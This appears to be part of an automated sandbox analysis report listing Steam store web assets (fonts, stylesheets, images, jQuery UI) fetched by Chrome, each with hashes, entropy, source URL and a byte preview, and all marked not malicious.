        Preview:........... DSIG............GDEF...4...,...@GPOS..n)...l..ujGSUB.d....v.....OS/2t.....|...`cmap.d..........cvt F).....d....fpgm.6!....,....gasp.......\....glyf...d...l....head...A...$...6hhea...+...\...$hmtxv.x.........loca..g....h....maxp........... name.\....0....post............prep.......D...................................s...t.u...v......./......... .Q...........D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J..................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 24 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansMedium4.015;Plau;MotivaS
        Category:downloaded
        Size (bytes):124048
        Entropy (8bit):6.074024700633004
        Encrypted:false
        SSDEEP:1536:v4Kkq/szjKJRIDCnR96guXgECINo28BZZDhpkemOXaxq4jKea8GyFLaE0Af0ffL9:vf/fxn7ElXxE0wS0fj9
        MD5:2D64CAA5ECBF5E42CBB766CA4D85E90E
        SHA1:147420ABCEB4A7FD7E486DDDCFE68CDA7EBB3A18
        SHA-256:045B433F94502CFA873A39E72D616C73EC1B4C567B7EE0F847F442651683791F
        SHA-512:C96556EC57DAC504919E806C7DF536C4F86892B8525739289B2F2DBBF475DE883A4824069DBDD4BB1770DD484F321563A00892E6C79D48818A4B95406BF1AF96
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Medium.ttf?v=4.015
        Preview:........... DSIG...........GDEF...4...,...@GPOS......l..u.GSUB.d....w.....OS/2u..........`cmap.d..........cvt G..t........fpgm.6!........gasp............glyf5.}2........head...W.......6hhea...v.......$hmtx._X.........loca.:yV........maxp.......l... names...........post.......<....prep..........................................s...t.u...v......./......... .Q...........D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J..................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (26986), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):131153
        Entropy (8bit):5.850355159405016
        Encrypted:false
        SSDEEP:1536:9EHpFUgj8v3Yt+RCa0/+pQyprgaiuBYjB2nkyq1lze5oHsvLNb5O:OpFSiug28Fsv1I
        MD5:B7CD609BA485DC1194D2AC0473A67C9F
        SHA1:A94697CDC5826260DC6FE05380ACCF49EF7411F8
        SHA-256:F3E896AC7C983066B3572EDED05480958514E96B7574C1BD7AA32B1BF138712B
        SHA-512:4D87496368C1FFE530948D85F9E7AA13ECBCCD068079BDBD5858F1A5AED769CA2CABEA55A63341B5B34358AF7FDC7C16B8C9D925FD557B70CF5007255831EC6A
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/css/applications/store/main.css?v=t81gm6SF3BGU&l=russian&_cdn=cloudflare
        Preview:...........html body.events_hub.v6{background-color:#171a21;font-family:"Motiva Sans",Arial,Helvetica,sans-serif}@media screen and (max-width: 400px){html body.events_hub.v6{scrollbar-width:none;-ms-overflow-style:none}html body.events_hub.v6::-webkit-scrollbar{display:none}}html body.events_hub.v6 #global_header{position:fixed;z-index:12;width:100%;box-sizing:border-box;transition:transform .15s ease-in-out}html body.events_hub.v6 .responsive_header{box-shadow:none;transition:transform .15s ease-in-out}html body.events_hub.v6 .responsive_page_template_content{padding-bottom:0}html body.events_hub.v6 ._2uHYtSBLSS1MxFonkOXr0O{flex:1;display:flex;flex-direction:column;min-height:0}html body.events_hub.v6 .perf_timing_area{position:absolute;bottom:0}body.rewards ._2uHYtSBLSS1MxFonkOXr0O{flex:1;display:flex;flex-direction:column;min-height:0}...pu9cOpUMN0Q4mmIX2WZPl{position:fixed;top:0;bottom:0;right:0;left:0;z-index:1599}._2qyBZV8YvxstXuSKiYDF19:focus{outline:none}.GreenEnvelopeMenu,.LQk
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 618 x 348
        Category:downloaded
        Size (bytes):14750473
        Entropy (8bit):7.854751266503601
        Encrypted:false
        SSDEEP:196608:sIu4graVxat+rjw603nP0dYTX+GjEcdulK/kO9C/se63mZpjK014qyG:ru4gr4xE603nP0dYT/3XC/N+Up54qb
        MD5:8C82F7E967685FB90CAD561E871214C0
        SHA1:4873F852E11EAA5DA1B2AFEB745B983C30DAA4E3
        SHA-256:8A05375C51AA59656902D47E07D5930958A7B39EF180F324DE9E810025DD3C74
        SHA-512:D684A854130794DC66AD178213693964A0643801319F7AF843823A7718850A13F76184BED5D42B8870F4AD92D7138DCC2D10740588C7667DCFE73C31580EB5D1
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/S.T.A.L.K.E.R.2_gunfight.gif?t=1705420866
        Preview:GIF89aj.\...1................................................................................................................................................................................ ..(............................................"..#.. ..& .. .. .. ." !( %0!..! #".." !"!%""("#+#%-&'/'..'$('&,')0)..),6*,4+..+..+$%+).++0,$",)%,/8-..0'.0071*!2)*2.13..3&.3494.,45=5..6427-%7:A:..;..>.,>:>?4/@71A?@ACJB<3F..G..I..I&.I+.I70IJRJA5JDCM0.M4"NQYQ?!R:/RE5RF>RIHUW_W .X..XSNZ&.Z&.ZA1ZHA[*.[RA[\cc#.c'.c\]ebcfG<fhqh-.hB-hU>iYFj=.k$.k1.k^Nl4.mhaqt|r$.u3.y=.ygX{&.{cM{m[|E1~ww.1..ue....V9.r[.?..I...y.............C2..d.v_....Z8.eJ.R......x................@6.hH.sQ..|....]7....c@.uM..\.gD....T.|.a.@8...uL.o.dF.x.S.`.....c....e.r.....g.x...a.....................!..NETSCAPE2.0.....!.......,....j.\.................................................................................................................................................................................. ..(..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 292x136, components 3
        Category:dropped
        Size (bytes):26385
        Entropy (8bit):7.974629531685947
        Encrypted:false
        SSDEEP:768:EO9jH11SFHyB9c36wKTruXd/x6ZPZP1CzB8dSS8:EOpHxB9S6pTruXpMdDQedSS8
        MD5:A47C1DEAB80B1465AB83EABBE59781ED
        SHA1:2FC622363150BD1ABB8B5C66F45127C52AE69D26
        SHA-256:3FEDE1EF6D1DAA3E7C4806E33F6650E3D794CE8D5F91648FE76CBBE498E30CEF
        SHA-512:0AD78C825585709E31D0429FC1D33D97DCE35671BC400B534CEA0226D0CAD338819EDF9DF1897D32E84C648EEFC1F3093AAB3E32FA3CB3C6B58F58D28CC3C7A7
        Malicious:false
        Reputation:low
        Preview:......JFIF.....&.&.....C....................................................................C.........................................................................$............................................S........................!..1..AQ."aq#2B.......RT....3CDSb....$cr...%45.......EUd..................................R........................!1.AQ.."aq..........2BRSb....#r.3......4Cc$6DT..%5Ust...............?..|.G.A.A.BU..(o...d.?.?V5.*.NR..g.EX....G?V4.R..=CM}...b8#?...$T.5 .-.._.U.....cH....H!.O...*.t.~.>.i".}o:z.f...i!..}X.j..t.6.....*.C.2.X.j..t.6....."..w.u...J...aj..~QR-.?...k....K.F~...QC.:.X...(-Y.?.+.I....c^.W.:.Z3...WB....~.k^q\iO...c...Q..:.X.9.q..?f?..}.......+..n-Y.1.Et(...~.k^q_[......"..P..P.V5..q..(...=U"..zS..cm\kql...R..3..>.k.j..u....1.*t.C.N.V5..q...~.x....@.../.{i\|.{.g...E....~.k.J.^...1.+.@../.ci\k..?Px..~..V5..q...~....[.....c^.W.:.2...U.B?...{m\k...f<.@.1....cY.W.:..3.c....!..~.km.q..?f?.........W.:n.V~.~.Q5.?...o....M.j
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 460x215, components 3
        Category:downloaded
        Size (bytes):38138
        Entropy (8bit):7.9774158194225935
        Encrypted:false
        SSDEEP:768:Dd8cAF6/J8MCZ0o28wyMjTWXMyv/0srzBz51d9yB46X:Oi/4ZnpMGX90GNz51d984C
        MD5:84F07F8CF9BC037399CCB9FC52036773
        SHA1:EDCC9978B32C067BF7837EFA0F85978C17B4D7F4
        SHA-256:008E131346FE7C699029633AB3F7F0E0D04FF4A94FA44AF08A394C6FC8B840C3
        SHA-512:68D23BB43B58B570BDCC4277AA85E9B649F5E17ACBBD942E5307CB1C873B7325347B59A6C0A894DF22266CB13958BB66BB86E064FB449454A951874D870E4B14
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/221100/header.jpg?t=1715264925
        Preview:......JFIF.............C....................................................................C.......................................................................................................................O..........................!1A.."Q..aq2B...#..3R....$br...%s.4C........5DSUcu.................................1......................!.1A."Q.2aq........B..#3.............?.y.Q.R.8..5.7..M%.....c...Xq..........$B.{.D).M....r.J_.{...0G.Np.;.....8.P.DW.B7U .M.@{2.....0.......`....`.} .+.A.V.EE..n....4..._...&&..0.qV*.@..dZ..[...!J..6E......hV.t.=...1..&.V....24.._L...2m..[.v...D...i.B.`.=O...le..4....f}..w..tV.V.}C..,Gkc.#'!6I.....THo....3.M...h/b."T.....l.j..m.....C.......|i....,......W.^0....-.at.k...5.}......[....f....3..~.:.7..q......q.o.b._.>..3a...?...&Vm.c74.N.,.....l.}N..Cw0.kC..e..TrL.yt.......NVZO......~...Jl....E.Uv.Da..\.47=.~...|[...=..2....sh.%....%lQ....8...n.6.h..M.i7=>.....w....5k+......o.dY.P.+.g;..W.2.o.....\U..j.#dys...2L.{.v..>..qv
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):11267
        Entropy (8bit):7.953108578270147
        Encrypted:false
        SSDEEP:192:rjTLdXTOdJtJKcwI9l9kXib1Fr0VgUqTdMxbb2vX2nZMUZUJsoZQEi6/XFhQOL7:pOdJtEcT8Xi7rXTTixvtvUJzZriuVhD7
        MD5:763D471AB4E7E1A431307D1AEF439DD3
        SHA1:9C439202DA24B72AA0FEEF0CEC0D0C55D11A3224
        SHA-256:CE114A269899D7DC044CFB75F7E13951950C8B6769AEC144A31A3EB202191FF3
        SHA-512:351EE2E35CF971BC362A717755DE52F482B1E1C026F9C67110FB52DDF5B346FDCCFAD08B7A5622F7CCD30DA8F1CB918228F3568391447E10BA5502414A0E28BB
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1086940/capsule_184x69.jpg?t=1713271288
        Preview:......JFIF.............C....................................................................C.......................................................................E............................................9..........................!..1"A..2Qa#q.BR...b.$3r......................................9.........................!1AQa."q........#2B...Rb..r...............?......(.Mm...o.]}..S..../.qh2...c*-..V.......K.....:.o..9...S6.qt..$.U?3.......0..5.W.x9I...1qmF..FV..k@......n..AR......!.L(.k=U....J..~V3.7.B.e.~...X..H`|....:...I.?..c.G^..)....R.p.$.L..c.+.V&PUO..tF. ..&.2.?Q.]|hGp...). .....PG!...98.h...+..).......G...K..#.H<.d.....rK.8...T.M..aP.Y=...eK.. .....tz......5..}....O.~t..s.N.....%i.\...2....|....P{B.\*&|.Q.U.g.SYP ..".mv.i.;.h.N.n..F.>..#.G]6.i.a.7...=.evo-.t).Z&..~C.x.mkB"xq.\Op.O.....=.<|....P.[...s...p.b..2B.A........8O..../......:.n) Um..........+1l..o:..=f..x..}.....5.SV.?.Z8oY...-.)....|.l.....F..n........d)I.]....$.w...m....Va..e?.n..X...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):28559
        Entropy (8bit):5.262186187442227
        Encrypted:false
        SSDEEP:768:2hJnn2xEc//0l/+C4znthJJBhDITMyGMuJMESfT2TyFhgWGuzoayLdE8W4zMsJz9:2hFe+YTVXYiJKkWsdE8hzZ7
        MD5:A16D8FC4534882652759FBEC59014B6F
        SHA1:31204767F7DB5BCDF07B874FF2BA9CAB1D85F35B
        SHA-256:C35F9794C92CA0C8618671ED69ED4DAE1E5C668481508CEE499126AB12E73C5A
        SHA-512:C7A530DF84643953159F22A8688A08C47979FF78698A98FF472EE5CECFDFCD55B4EC3463056E02C1D02FCA99E412F6CACF6FA059ADE61A2C5B73A77754D05E06
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/css/apphub.css?v=oW2PxFNIgmUn&l=russian&_cdn=cloudflare
        Preview:..body..{.. background: #1b2838;.. color: #acb2b8;..}....center..{....}../* admin */...apphub_NormallyHiddenBanner..{...max-width: 918px;...margin: 0px auto;...margin-top: 10px;...padding: 15px;...background-color: #3a3a3a;...border: 1px solid #529cde;...font-size: 1.125em;...color: #ffffff;...text-align: left;....}..../* header */...apphub_HeaderTop..{...position: relative;...margin: 0 auto;...text-align: left;...padding-top: 12px;..}.........apphub_background..{...background-position: center top;...background-attachment: fixed;...background-repeat: no-repeat;...background-size: cover;..}.......apphub_HeaderTop.workshop..{...background-image:url('https://store.cloudflare.steamstatic.com/public/shared/images/apphubs/bg_workshop_header.png?v=3');..}...BasicUI.gpnav_active .apphub_HeaderTop.workshop..{...background-image: none;..}.....apphub_HeaderStandardTop..{...position: relative;...margin: 0px auto;...text-align: left;...padding-top: 7px;...min-height: 46px;...background-image:
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):15887
        Entropy (8bit):1.9415935019028925
        Encrypted:false
        SSDEEP:48:V/6uSN+k29W8sEvUxN+Y9rNGcfJdGwW/JtAABCSrMLIqIL8Thsc5b77cspcarVam:VSDskEWRFxNXrNGQvGX8w2sc5TTpcNnm
        MD5:8D6F31CEAD93DDE55C98A27CDA35C2AC
        SHA1:11E506A1FC3E7570CACBCCC985E68AF78097EA3A
        SHA-256:A1A9891CEA6178EB76611D404C623AF7DDD3DA277B66AC31E41D8966F245A539
        SHA-512:A4D4A8C6CF66371D97B8A3A12FA51AB816CE96005F565411C56D857D24591C3046E77042D893D09E2FA503BF6CD9FE5F013A64B5D2126A7775EA3A6E26263D18
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/icon_platform_oculusrift.png
        Preview:.PNG........IHDR.....................pHYs...............<}iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2016-02-16T16:27:44-08:00</xmp:CreateDate>. <xmp:ModifyDate>2016-03-30T17:37:07-07:00</xmp:ModifyDate>. <xmp:M
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (840), with CRLF line terminators
        Category:downloaded
        Size (bytes):454401
        Entropy (8bit):5.1427042619976
        Encrypted:false
        SSDEEP:6144:OQKA92KnqUrxk5j5f5459RvqBbKCVi2IRIwDbnWD5ZOIh0p9LqLVHRmBrhePtHJn:GUrxk5j5f5459RCBbKCVi2IRrn9K
        MD5:0580E7FDD35C41A034F52BFCEEEBE7DE
        SHA1:DAB179021EF8359C7C4CB1B66E23DD968584538D
        SHA-256:09C725DC5DB9174DA91684ADF6D34526BCFA89BAAC5453C082886925CE878F73
        SHA-512:92EA5ACD88DCAD89E07A79FF90AAE3B436A607C7BCD81D2AF0B20C146454C599A761DA42A3730E5424A3254937CDDF351BD94EB2376A8981939CB0DFD7785C97
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/javascript/jquery-ui-1.9.2.js?v=.4YjdpcHj68MM&_cdn=cloudflare
        Preview:/*! jQuery UI - v1.9.2 - 2012-12-05..* http://jqueryui.com..* Includes: jquery.ui.core.js, jquery.ui.widget.js, jquery.ui.mouse.js, jquery.ui.position.js, jquery.ui.draggable.js, jquery.ui.droppable.js, jquery.ui.resizable.js, jquery.ui.selectable.js, jquery.ui.sortable.js, jquery.ui.accordion.js, jquery.ui.autocomplete.js, jquery.ui.button.js, jquery.ui.datepicker.js, jquery.ui.dialog.js, jquery.ui.menu.js, jquery.ui.progressbar.js, jquery.ui.slider.js, jquery.ui.spinner.js, jquery.ui.tabs.js, jquery.ui.tooltip.js, jquery.ui.effect.js, jquery.ui.effect-blind.js, jquery.ui.effect-bounce.js, jquery.ui.effect-clip.js, jquery.ui.effect-drop.js, jquery.ui.effect-explode.js, jquery.ui.effect-fade.js, jquery.ui.effect-fold.js, jquery.ui.effect-highlight.js, jquery.ui.effect-pulsate.js, jquery.ui.effect-scale.js, jquery.ui.effect-shake.js, jquery.ui.effect-slide.js, jquery.ui.effect-transfer.js..* Copyright (c) 2012 jQuery Foundation and other contributors Licensed MIT */....(function( $, und
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 618 x 348
        Category:dropped
        Size (bytes):14750473
        Entropy (8bit):7.854751266503601
        Encrypted:false
        SSDEEP:196608:sIu4graVxat+rjw603nP0dYTX+GjEcdulK/kO9C/se63mZpjK014qyG:ru4gr4xE603nP0dYT/3XC/N+Up54qb
        MD5:8C82F7E967685FB90CAD561E871214C0
        SHA1:4873F852E11EAA5DA1B2AFEB745B983C30DAA4E3
        SHA-256:8A05375C51AA59656902D47E07D5930958A7B39EF180F324DE9E810025DD3C74
        SHA-512:D684A854130794DC66AD178213693964A0643801319F7AF843823A7718850A13F76184BED5D42B8870F4AD92D7138DCC2D10740588C7667DCFE73C31580EB5D1
        Malicious:false
        Reputation:low
        Preview:GIF89aj.\...1................................................................................................................................................................................ ..(............................................"..#.. ..& .. .. .. ." !( %0!..! #".." !"!%""("#+#%-&'/'..'$('&,')0)..),6*,4+..+..+$%+).++0,$",)%,/8-..0'.0071*!2)*2.13..3&.3494.,45=5..6427-%7:A:..;..>.,>:>?4/@71A?@ACJB<3F..G..I..I&.I+.I70IJRJA5JDCM0.M4"NQYQ?!R:/RE5RF>RIHUW_W .X..XSNZ&.Z&.ZA1ZHA[*.[RA[\cc#.c'.c\]ebcfG<fhqh-.hB-hU>iYFj=.k$.k1.k^Nl4.mhaqt|r$.u3.y=.ygX{&.{cM{m[|E1~ww.1..ue....V9.r[.?..I...y.............C2..d.v_....Z8.eJ.R......x................@6.hH.sQ..|....]7....c@.uM..\.gD....T.|.a.@8...uL.o.dF.x.S.`.....c....e.r.....g.x...a.....................!..NETSCAPE2.0.....!.......,....j.\.................................................................................................................................................................................. ..(..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):56457
        Entropy (8bit):7.980487681254863
        Encrypted:false
        SSDEEP:1536:pQvpiwq4ornbgR80+JTtSWaBFhO244F9A8t:pkpiwqXM82WaLgM9jt
        MD5:1280A0B10D3B26FC866724D248DC8EB5
        SHA1:7F2CD24A39B97480FC8BBC5AAA26C36D8E23FF5C
        SHA-256:B21434C630C2EAE40B5B513EA5033FFE2A343B065167CF9466823A6327EF1BD2
        SHA-512:DF271799B0B996CF59E972C8F6E2F971A28351B1EEB01DD07F39A1568D5D65ED5B0F56C88D6A6A6122C31C522643F788C2AF1F96A06057528D8100D6E1E21860
        Malicious:false
        Reputation:low
        Preview:......JFIF.....%.%.....C....................................................................C.......................................................................Q.X............................................d.........................!"1..AQa.#2q.....$3BR......%&b..45CSTr...6DUcet....'VWs.....7EGdu.Fv......................................D.....................!..1A..Q.a..Rq........"23S.#4r..BC$%5Tb...D............?...};c......7.Q.yNC..z..g.>...v...n..........<...s=i.`..lf....I...2.m~..s=i.f].em..m..mu.b.V..-)bK:..l..p..J....p..l...t`R.mi...&..".W..|Y.!.S...=K.........8....(4.W..P.....5.,:.j1.z@d...k.2ZPo....N..T..6....k..#.._...K.3....b....:.U.86r...}.%........t...'..1...#...Q..P.=a...m.BT........].=.4.-..5.y.....&...m.~h.aIu..`V.....<..!J.Y.Mo...`.$...\..../...J.._P......5P..p.&.U4.Zf.$`i...J.[p..u.....G...Q../..y.c...U..(yi..\+.^z..25...P..R.q..{|..]..= .P.J...o...N.9yF.WC<.b.{x.z....I".q..q...j...+......qg..=!.....+5.:rO.....B..-i.=bi@&...k^H..II&.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 24 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansThin4.015;Plau;MotivaSan
        Category:downloaded
        Size (bytes):118736
        Entropy (8bit):6.0569560995718
        Encrypted:false
        SSDEEP:1536:GAAAAAAAgsAAAYgIAAAAsAuErzzzz6mfzzVCA9zzzzzzdp/koLAGXImE98YfgNi9:kErZDE9BfgNiX9k3SDHewStfNwS0fj9
        MD5:CE6BDA6643B662A41B9FB570BDF72F83
        SHA1:87BCF1D2820B476AAEAEA91DC7F6DBEDD73C1CB8
        SHA-256:0ADF4D5EDBC82D28879FDFAAF7274BA05162FF8CBBDA816D69ED52F1DAE547F6
        SHA-512:8023DA9F9619D34D4E5F7C819A96356485F73FDDCB8ADB452F3CEEFA8C969C16CA78A8C8D02D8E7A213EB9C5BBE5C50745BA7602E0EE2FE36D2742FB3E979C86
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/fonts/MotivaSans-Thin.ttf?v=4.015
        Preview:........... DSIG............GDEF...4...,...@GPOS".j....l..j.GSUB.d....k.....OS/2t..........`cmap.d..........cvt E...........fpgm.6!.........gasp............glyf;9.........Thead.z.;.......6hhea...........$hmtxj4.w...8....locaij*V... ....maxp........... name............post.......|....prep...........................................s...t.u...v......./......... .Q...........D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J..................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 292x136, components 3
        Category:dropped
        Size (bytes):11506
        Entropy (8bit):7.958653271170369
        Encrypted:false
        SSDEEP:192:ueevq6tUA5+/C3RjIX4w/pDhs99XlDI9s1m5uc4KXPsmh7hjcyV0zYELGU:udhtUA5+/CV6dhmUs1mDfs4Vjcc0tiU
        MD5:71D9E8B57744D4B57259C539D11DB462
        SHA1:7C1B6D995752DBFAB77B9C6FC4C73AC23CDA66F1
        SHA-256:3C97321EFB6853A0CEE9019A7CED651E4076F69D521E55094597AE63FA0C3D56
        SHA-512:FC6F37BC6950C451B55E307EDC8A8B5334E79C2557168122832B7642892253E6A12A997ED7C653E1986CB12E07C534E6EB0B7DE2ADD9BAA8E59E4D6E995252D4
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.........................................................................$............................................=........................!..1A.."Qaq.2B.....#....$CR.%34br..................................=.......................!1..AQaq.."......2...#..$3BR.%5br...............?...A^....W..0....D..i.I..h)h<......4..b.8..=..Qq..*.c.....`.........0=Sj...q.........$^b..Rv.N99...$.h.0:7.{`...,..P..`......H.74....@.*.......LPV.....Gz.9{...h.d.I.)*.S...*..".F1.)#D..a..I"F..}.Q.m.(B1....t.R.#.<d_,{.(..Z...E.@............(..........h.B...@!.........*/....6.K..d.@..0(......0n[lc..$8%....-.........(Z..pM.......<.Q.@.Q....N(......[.......X....XX.......NA....Z......mF.`z......3.Q...t.N(T\d.KH4kH.....j........wj.Q.{.. P<h9Fr(...=.....7W.e.w......;.(...y.':t.*q.ke.....f..........n..[.Fh...{[l$..W..m.1..#......J.,h...^....}....v...Y.+L%....y......U.=..}..NP...\.j5A.x....kV.<.Yf..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1177
        Entropy (8bit):6.590984258866245
        Encrypted:false
        SSDEEP:24:c1hfvWwh82lYSgT2EV5CT3ZyJ3VNIEGdvzQvAXeho0f9Fcup2:CAvntm0J3tmzSAI4uk
        MD5:3EA2CC27536CC740703ED4554D5ACEEF
        SHA1:80EE5C2D61272C33A2D36F536CA47A38CF1A743D
        SHA-256:055F04346E95B75C4260E7064374E908FC213041679DD172DF80D6551CB5D15C
        SHA-512:969F45A845F94E02D5A5859CA033A20C7DD83774E8D032CA529A3692E74FE1816EFC3994D26E6AB874DD94F0901DC381BFA385FF096DF77B7A0C930A5B9C4734
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:95752D8EC8C611E7A1BBDD153715961C" xmpMM:InstanceID="xmp.iid:95752D8DC8C611E7A1BBDD153715961C" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EFB48ADB4CB311E3AB3FC1E695F5A0EB" stRef:documentID="xmp.did:EFB48ADC4CB311E3AB3FC1E695F5A0EB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..Q.....IDATx..1..0..M[....VQZo.&."x....G.....+.... .`A....J.I.....6.~.^...a..eG...6........&.c..F.p<...0.]P.y)..G.=.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1128
        Entropy (8bit):7.723345029915411
        Encrypted:false
        SSDEEP:24:BxLvMozLRF7MwIlr4GTz4Hm+zhdR3mIapBLtEijGyv0k9w2t:7Eozf7x+EGTEHmWTapB5EUJv0k9rt
        MD5:6977113832E374E987A7D8BC22C07C41
        SHA1:5FF11962D052B7206CB9C10E83645DA650028124
        SHA-256:5E3BB2AF3D3F0212D5B7306506306DBFCED035B3C3E0ED113F993C79861C3D2D
        SHA-512:EA6B3B0E17EF07EE29DFE633022165E5FD65E6FC52FB3C77448FF373A1856F45887A31C739E934E2A044B883CA8780CD84A2E18BDE074E1EEC9F8478A5EA1902
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/social/twitter_large.png
